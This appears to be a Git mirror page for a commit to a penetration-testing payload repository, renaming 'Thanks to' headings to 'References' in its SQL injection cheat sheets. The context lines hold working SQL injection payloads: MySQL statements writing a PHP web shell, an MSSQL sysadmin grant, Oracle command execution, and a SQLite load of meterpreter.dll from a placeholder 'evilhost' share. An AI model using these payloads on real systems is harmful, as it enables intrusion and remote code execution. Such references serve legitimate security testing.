weyne/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/weyne85/PayloadsAllTheThings.git synced 2025-10-29 16:57:02 +00:00
Code Issues Packages Projects Releases Wiki Activity

Adding references sectio

Browse Source
This commit is contained in:
Swissky
2018-12-24 15:02:50 +01:00
parent 9c529535a5
commit a6475a19d9
52 changed files with 127 additions and 65 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
SQL injection/Cassandra Injection.md
View File

@@ -32,6 +32,6 @@ SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILT
Example from EternalNoob : [https://hack2learn.pw/cassandra/login.php](https://hack2learn.pw/cassandra/login.php)
## Thanks to
## References
* [Injection In Apache Cassandra Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/)

2
SQL injection/MSSQL Injection.md
View File

@@ -119,7 +119,7 @@ RECONFIGURE
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
```
## Thanks to
## References
* [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
* [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/)

2
SQL injection/MySQL Injection.md
View File

@@ -125,3 +125,5 @@ SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo
[...] UNION SELECT 1,2,3,4,5,0x3c3f70687020706870696e666f28293b203f3e into outfile 'C:\\wamp\\www\\pwnd.php'-- -
[...] union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
```
## References

2
SQL injection/OracleSQL Injection.md
View File

@@ -91,6 +91,6 @@ EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f7220726570
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
```
## Thanks to
## References
* [Heavily taken inspired by - NetSpi SQL Wiki](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle)

2
SQL injection/PostgreSQL Injection.md
View File

@@ -44,6 +44,6 @@ SELECT * FROM pentestlab;
COPY pentestlab(t) TO '/tmp/pentestlab';
```
## Thanks to
## References
* [A Penetration Testers Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)

2
SQL injection/README.md
View File

@@ -460,7 +460,7 @@ mysql> mysql> select version();
+-------------------------+
```
## Thanks to - Other resources
## References
* Detect SQLi
* [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)

2
SQL injection/SQLite Injection.md
View File

@@ -73,6 +73,6 @@ UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');
Note: By default this component is disabled
## Thanks to
## References
[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/41397.pdf)